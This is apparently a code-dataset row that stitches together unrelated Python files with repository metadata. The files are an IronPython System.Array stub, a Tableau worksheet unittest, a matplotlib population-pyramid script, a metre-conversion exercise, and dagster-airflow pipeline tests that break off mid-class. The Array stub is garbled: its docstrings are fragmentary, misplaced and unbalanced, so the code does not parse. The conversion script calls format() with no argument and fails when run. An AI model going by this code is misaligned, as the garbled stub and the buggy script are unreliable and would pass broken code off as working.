Determines whether the System.Collections.IList contains a specific value.
value: The object to locate in the System.Collections.IList.
Returns: true if the System.Object is found in the System.Collections.IList; otherwise,
false.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y] """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __hash__(self,*args):
""" x.__hash__() <==> hash(x) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __len__(self,*args):
""" x.__len__() <==> len(x) """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __mul__(self,*args):
""" x.__mul__(y) <==> x*y """
pass
@staticmethod
def __new__(self,*args): #cannot find CLR constructor
"""
__new__(pythonType: type,items: object) -> object
__new__(pythonType: type,items: ICollection) -> object
"""
pass
def __ne__(self,*args):
pass
def __radd__(self,*args):
""" __radd__(data1: Array,data2: Array) -> Array """
pass
def __reduce_ex__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: Array) -> str """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]=x.__setitem__(i,y) <==> x[i]=x.__setitem__(i,y) <==> x[i]= """
pass
IsFixedSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Array has a fixed size.
Get: IsFixedSize(self: Array) -> bool
"""
IsReadOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Array is read-only.
Get: IsReadOnly(self: Array) -> bool
"""
IsSynchronized=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether access to the System.Array is synchronized (thread safe).
Get: IsSynchronized(self: Array) -> bool
"""
Length=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a 32-bit integer that represents the total number of elements in all the dimensions of the System.Array.
Get: Length(self: Array) -> int
"""
LongLength=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a 64-bit integer that represents the total number of elements in all the dimensions of the System.Array.
Get: LongLength(self: Array) -> Int64
"""
Rank=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the rank (number of dimensions) of the System.Array.
Get: Rank(self: Array) -> int
"""
SyncRoot=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets an object that can be used to synchronize access to the System.Array.
Get: SyncRoot(self: Array) -> object
"""
| 42.993548
| 617
| 0.702131
|
class Array(object,ICloneable,IList,ICollection,IEnumerable,IStructuralComparable,IStructuralEquatable):
@staticmethod
def AsReadOnly(array):
pass
@staticmethod
def BinarySearch(array,*__args):
must be between zero and System.Int32.MaxValue,inclusive.
Copy(sourceArray: Array,destinationArray: Array,length: int)
destinationArray: The System.Array that receives the data.
Copies all the elements of the current one-dimensional System.Array to the
specified one-dimensional System.Array starting at the specified destination
System.Array index. The index is specified as a 64-bit integer.
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,*lengths: Array[Int64]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing. The dimension lengths are
specified in an array of 64-bit integers.
GetEnumerator(self: Array) -> IEnumerator
pass
def GetUpperBound(self,dimension):
"""
Initialize(self: Array)
Initializes every element of the value-type System.Array by calling the default
constructor of the value type.
pass
@staticmethod
def LastIndexOf(array,value,startIndex=None,count=None):
LastIndexOf[T](array: Array[T],value: T) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int,count: int) -> int
Searches for the specified object and returns the index of the last occurrence
within the entire one-dimensional System.Array.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
from the first element to the specified index.
value: The object to locate in array.
startIndex: The starting index of the backward search.
Returns: The index of the last occurrence of value within the range of elements in array
the specified number of elements and ends at the specified index.
value: The object to locate in array.
startIndex: The starting index of the backward search.
pass
@staticmethod
"""
SetValue(self: Array,value: object,index1: Int64,index2: Int64)
SetValue(self: Array,value: object,*indices: Array[Int64])
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to set.
Sets a value to the element at the specified position in the one-dimensional
System.Array. The index is specified as a 32-bit integer.
"""
| true
| true
|
f70b78fe961ac969ab87dde5b0b394f97850c561
| 1,589
|
py
|
Python
|
test/test_worksheet.py
|
adrianturcato/document-api-python
|
a9b69fa83210172c9302b57f5f5cd4dfa7e9d1c5
|
[
"MIT"
] | null | null | null |
test/test_worksheet.py
|
adrianturcato/document-api-python
|
a9b69fa83210172c9302b57f5f5cd4dfa7e9d1c5
|
[
"MIT"
] | null | null | null |
test/test_worksheet.py
|
adrianturcato/document-api-python
|
a9b69fa83210172c9302b57f5f5cd4dfa7e9d1c5
|
[
"MIT"
] | null | null | null |
import os.path
import unittest
import hashlib
from tableaudocumentapi import Workbook
TEST_ASSET_DIR = os.path.join(
os.path.dirname(__file__),
'assets'
)
TEST_TWB_FILE = os.path.join(
TEST_ASSET_DIR,
'group_test.twb'
)
TEST_TWB_FILE2 = os.path.join(
TEST_ASSET_DIR,
'add_user_filter_test.twb'
)
ACCESS_PERMISSIONS = os.path.join(
TEST_ASSET_DIR,
'access_permissions.csv'
)
class WorksheetTWB(unittest.TestCase):
def test_worksheet(self):
self.wb = Workbook(TEST_TWB_FILE)
self.worksheets = self.wb.worksheets
self.assertEqual('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.worksheets[0].datasources[0]['name'])
self.assertTrue(self.worksheets[0].slices.has_user_filter())
def test_adding_column_to_slices(self):
print("test_adding_column_to_slices")
with open(ACCESS_PERMISSIONS) as f:
self.csv2 = f.read()
self.wb2 = Workbook(TEST_TWB_FILE2)
self.assertEqual(2,len(self.wb2.worksheets))
self.assertEqual('Sheet 1', self.wb2.worksheets[0].name)
self.assertEqual('[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[none:Advertiser:nk]', self.wb2.worksheets[0].slices.columns[0])
self.assertFalse(self.wb2.worksheets[0].slices.has_user_filter())
self.wb2.ingest_access_permissions('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.csv2)
self.assertEqual("[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[User Filter 1]",self.wb2.worksheets[0].slices.columns[0])
self.assertTrue("has", self.wb2.worksheets[0].slices.has_user_filter())
| 30.557692
| 131
| 0.71995
|
import os.path
import unittest
import hashlib
from tableaudocumentapi import Workbook
TEST_ASSET_DIR = os.path.join(
os.path.dirname(__file__),
'assets'
)
TEST_TWB_FILE = os.path.join(
TEST_ASSET_DIR,
'group_test.twb'
)
TEST_TWB_FILE2 = os.path.join(
TEST_ASSET_DIR,
'add_user_filter_test.twb'
)
ACCESS_PERMISSIONS = os.path.join(
TEST_ASSET_DIR,
'access_permissions.csv'
)
class WorksheetTWB(unittest.TestCase):
def test_worksheet(self):
self.wb = Workbook(TEST_TWB_FILE)
self.worksheets = self.wb.worksheets
self.assertEqual('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.worksheets[0].datasources[0]['name'])
self.assertTrue(self.worksheets[0].slices.has_user_filter())
def test_adding_column_to_slices(self):
print("test_adding_column_to_slices")
with open(ACCESS_PERMISSIONS) as f:
self.csv2 = f.read()
self.wb2 = Workbook(TEST_TWB_FILE2)
self.assertEqual(2,len(self.wb2.worksheets))
self.assertEqual('Sheet 1', self.wb2.worksheets[0].name)
self.assertEqual('[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[none:Advertiser:nk]', self.wb2.worksheets[0].slices.columns[0])
self.assertFalse(self.wb2.worksheets[0].slices.has_user_filter())
self.wb2.ingest_access_permissions('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.csv2)
self.assertEqual("[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[User Filter 1]",self.wb2.worksheets[0].slices.columns[0])
self.assertTrue("has", self.wb2.worksheets[0].slices.has_user_filter())
| true
| true
|
f70b7a68b18379e63dccf55607bdb8100c19a3f3
| 2,639
|
py
|
Python
|
exercicio-4.py
|
AnielliRosane/lista-ser347
|
61a8ac8f675dc0ec05f45408c54e9d3a0e515ff4
|
[
"MIT"
] | null | null | null |
exercicio-4.py
|
AnielliRosane/lista-ser347
|
61a8ac8f675dc0ec05f45408c54e9d3a0e515ff4
|
[
"MIT"
] | null | null | null |
exercicio-4.py
|
AnielliRosane/lista-ser347
|
61a8ac8f675dc0ec05f45408c54e9d3a0e515ff4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Lista de exercicio 06
# Exercicio 4
# importando as bibliotecas
import matplotlib as plt
import matplotlib.pyplot as plt
import numpy as np
# informacoes da tabela relativas aos dados masculino e feminino (IBGE)
idade = np.array(
["0 a 4 anos", "5 a 9 anos", "10 a 14 anos", "15 a 19 anos", "20 a 24 anos", "25 a 29 anos",
"30 a 34 anos", "35 a 39 anos", "40 a 44 anos", "45 a 49 anos", "50 a 54 anos", "55 a 59 anos",
"60 a 64 anos", "65 a 69 anos", "70 a 74 anos", "75 a 79 anos", "80 a 84 anos", "85 a 89 anos",
"90 a 94 anos", "95 a 99 anos", "100 anos e mais"])
feminino = np.array([6779171, 7345231, 8441348, 8432004, 8614963, 8643419, 8026854, 7121915, 6688796, 6141338, 5305407,
4373877, 3468085, 2616745, 2074264, 1472930, 998349, 508724, 211594, 66806, 16989])
masculino = np.array([7016987, 7624144, 8725413, 8558868, 8630229, 8460995, 7717658, 6766664, 6320568, 5692014, 4834995,
3902344, 3041035, 2224065, 1667372, 1090517, 668623, 310759, 114964, 31529, 7247])
pop = [x for x in range( len(idade) ) ]
# Configuracao do grafico
plt.figure(figsize=(10, 8))
plt.suptitle('Distribuição da População por sexo segundo os grupos de idade – Brasil – 2010', fontsize=18)
plt.rc('axes.spines', **{'bottom': True, 'left': False, 'right': False, 'top': False}) # remove as linhas da figura
# Subplot masculino
plt.subplot(221)
plt.barh(idade, masculino, align='center', color='blue', linewidth=0.5, label='Masculino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["", "", "4000000"])
plt.legend(loc='upper left') # legenda
plt.subplots_adjust(left=0.15, wspace=0.4) # coloca espaco entre os graficos
plt.gca().invert_xaxis() # inverte
plt.yticks([]) # remove o eixo y
# colocando linhas
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.20)
# subplot feminino
plt.subplot(222)
plt.barh(idade, feminino, align='center', color='orange', linewidth=0.5, label='Feminino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["0", "", "4000000"], )
plt.legend(loc='upper right') # legenda
# colocando linhas
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.30)
plt.show();
| 35.662162
| 120
| 0.678287
|
import matplotlib as plt
import matplotlib.pyplot as plt
import numpy as np
idade = np.array(
["0 a 4 anos", "5 a 9 anos", "10 a 14 anos", "15 a 19 anos", "20 a 24 anos", "25 a 29 anos",
"30 a 34 anos", "35 a 39 anos", "40 a 44 anos", "45 a 49 anos", "50 a 54 anos", "55 a 59 anos",
"60 a 64 anos", "65 a 69 anos", "70 a 74 anos", "75 a 79 anos", "80 a 84 anos", "85 a 89 anos",
"90 a 94 anos", "95 a 99 anos", "100 anos e mais"])
feminino = np.array([6779171, 7345231, 8441348, 8432004, 8614963, 8643419, 8026854, 7121915, 6688796, 6141338, 5305407,
4373877, 3468085, 2616745, 2074264, 1472930, 998349, 508724, 211594, 66806, 16989])
masculino = np.array([7016987, 7624144, 8725413, 8558868, 8630229, 8460995, 7717658, 6766664, 6320568, 5692014, 4834995,
3902344, 3041035, 2224065, 1667372, 1090517, 668623, 310759, 114964, 31529, 7247])
pop = [x for x in range( len(idade) ) ]
plt.figure(figsize=(10, 8))
plt.suptitle('Distribuição da População por sexo segundo os grupos de idade – Brasil – 2010', fontsize=18)
plt.rc('axes.spines', **{'bottom': True, 'left': False, 'right': False, 'top': False})
plt.subplot(221)
plt.barh(idade, masculino, align='center', color='blue', linewidth=0.5, label='Masculino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["", "", "4000000"])
plt.legend(loc='upper left')
plt.subplots_adjust(left=0.15, wspace=0.4)
plt.gca().invert_xaxis()
plt.yticks([])
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.20)
plt.subplot(222)
plt.barh(idade, feminino, align='center', color='orange', linewidth=0.5, label='Feminino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["0", "", "4000000"], )
plt.legend(loc='upper right')
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.30)
plt.show();
| true
| true
|
f70b7a9deb9229cf2e91e60271efe0589b08ae67
| 295
|
py
|
Python
|
projetos em python/exercicio8.py
|
gustavo621/projetos-em-python
|
4797ae7226a2c4a628dd0cd746e7bc3050b72f04
|
[
"MIT"
] | null | null | null |
projetos em python/exercicio8.py
|
gustavo621/projetos-em-python
|
4797ae7226a2c4a628dd0cd746e7bc3050b72f04
|
[
"MIT"
] | null | null | null |
projetos em python/exercicio8.py
|
gustavo621/projetos-em-python
|
4797ae7226a2c4a628dd0cd746e7bc3050b72f04
|
[
"MIT"
] | null | null | null |
metros = int(input("uma distância em metro: "))
print("A medida de {}m corresponde a".format())
print("{}km".format(metros/1000))
print("{}hm".format(metros/100))
print("{}dam".format(metros/10))
print("{}dm".format(metros*10))
print("{}cm".format(metros*100))
print("{}mm".format(metros*1000))
| 32.777778
| 47
| 0.674576
|
metros = int(input("uma distância em metro: "))
print("A medida de {}m corresponde a".format())
print("{}km".format(metros/1000))
print("{}hm".format(metros/100))
print("{}dam".format(metros/10))
print("{}dm".format(metros*10))
print("{}cm".format(metros*100))
print("{}mm".format(metros*1000))
| true
| true
|
f70b7b226b60ffaa1edf1653d8ef3f8943d4f01f
| 9,614
|
py
|
Python
|
python_modules/dagster-airflow/dagster_airflow_tests/test_factory.py
|
rparrapy/dagster
|
453ebedb326eae48b5f8fa2a4a3811d94629dc6e
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster-airflow/dagster_airflow_tests/test_factory.py
|
rparrapy/dagster
|
453ebedb326eae48b5f8fa2a4a3811d94629dc6e
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster-airflow/dagster_airflow_tests/test_factory.py
|
rparrapy/dagster
|
453ebedb326eae48b5f8fa2a4a3811d94629dc6e
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
import os
import uuid
from airflow.exceptions import AirflowSkipException
from dagster_airflow.factory import AIRFLOW_MAX_DAG_NAME_LEN, _rename_for_airflow
from dagster_airflow.test_fixtures import ( # pylint: disable=unused-import
dagster_airflow_docker_operator_pipeline,
dagster_airflow_k8s_operator_pipeline,
dagster_airflow_python_operator_pipeline,
)
from dagster_airflow_tests.conftest import IMAGE
from dagster_airflow_tests.marks import nettest
from dagster import ExecutionTargetHandle
from dagster.core.events.log import DagsterEventRecord
from dagster.utils import script_relative_path
AIRFLOW_DEMO_EVENTS = {
('ENGINE_EVENT', None),
('STEP_START', 'multiply_the_word.compute'),
('STEP_INPUT', 'multiply_the_word.compute'),
('STEP_OUTPUT', 'multiply_the_word.compute'),
('OBJECT_STORE_OPERATION', 'multiply_the_word.compute'),
('STEP_SUCCESS', 'multiply_the_word.compute'),
('STEP_START', 'count_letters.compute'),
('OBJECT_STORE_OPERATION', 'count_letters.compute'),
('STEP_INPUT', 'count_letters.compute'),
('STEP_OUTPUT', 'count_letters.compute'),
('STEP_SUCCESS', 'count_letters.compute'),
}
ENVIRONMENTS_PATH = script_relative_path(
os.path.join(
'..',
'..',
'..',
'.buildkite',
'images',
'docker',
'test_project',
'test_pipelines',
'environments',
)
)
def validate_pipeline_execution(pipeline_exc_result):
seen_events = set()
for result in pipeline_exc_result.values():
for event in result:
if isinstance(event, DagsterEventRecord):
seen_events.add((event.dagster_event.event_type_value, event.step_key))
else:
seen_events.add((event.event_type_value, event.step_key))
assert seen_events == AIRFLOW_DEMO_EVENTS
class TestExecuteDagPythonFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagKubernetizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
class TestExecuteDagKubernetizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
def test_rename_for_airflow():
pairs = [
('foo', 'foo'),
('this-is-valid', 'this-is-valid'),
(
'a' * AIRFLOW_MAX_DAG_NAME_LEN + 'very long strings are disallowed',
'a' * AIRFLOW_MAX_DAG_NAME_LEN,
),
('a name with illegal spaces', 'a_name_with_illegal_spaces'),
('a#name$with@special*chars!!!', 'a_name_with_special_chars___'),
]
for before, after in pairs:
assert after == _rename_for_airflow(before)
def validate_skip_pipeline_execution(result):
expected_airflow_task_states = {
('foo', False),
('first_consumer', False),
('second_consumer', True),
('third_consumer', True),
}
seen = {(ti.task_id, isinstance(value, AirflowSkipException)) for ti, value in result.items()}
assert seen == expected_airflow_task_states
class TestExecuteSkipsPythonOperator(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteSkipsContainerized(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_docker_operator_pipeline)
| 36.976923
| 98
| 0.741939
|
from __future__ import unicode_literals
import os
import uuid
from airflow.exceptions import AirflowSkipException
from dagster_airflow.factory import AIRFLOW_MAX_DAG_NAME_LEN, _rename_for_airflow
from dagster_airflow.test_fixtures import (
dagster_airflow_docker_operator_pipeline,
dagster_airflow_k8s_operator_pipeline,
dagster_airflow_python_operator_pipeline,
)
from dagster_airflow_tests.conftest import IMAGE
from dagster_airflow_tests.marks import nettest
from dagster import ExecutionTargetHandle
from dagster.core.events.log import DagsterEventRecord
from dagster.utils import script_relative_path
AIRFLOW_DEMO_EVENTS = {
('ENGINE_EVENT', None),
('STEP_START', 'multiply_the_word.compute'),
('STEP_INPUT', 'multiply_the_word.compute'),
('STEP_OUTPUT', 'multiply_the_word.compute'),
('OBJECT_STORE_OPERATION', 'multiply_the_word.compute'),
('STEP_SUCCESS', 'multiply_the_word.compute'),
('STEP_START', 'count_letters.compute'),
('OBJECT_STORE_OPERATION', 'count_letters.compute'),
('STEP_INPUT', 'count_letters.compute'),
('STEP_OUTPUT', 'count_letters.compute'),
('STEP_SUCCESS', 'count_letters.compute'),
}
ENVIRONMENTS_PATH = script_relative_path(
os.path.join(
'..',
'..',
'..',
'.buildkite',
'images',
'docker',
'test_project',
'test_pipelines',
'environments',
)
)
def validate_pipeline_execution(pipeline_exc_result):
seen_events = set()
for result in pipeline_exc_result.values():
for event in result:
if isinstance(event, DagsterEventRecord):
seen_events.add((event.dagster_event.event_type_value, event.step_key))
else:
seen_events.add((event.event_type_value, event.step_key))
assert seen_events == AIRFLOW_DEMO_EVENTS
class TestExecuteDagPythonFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagKubernetizedS3Storage(object):
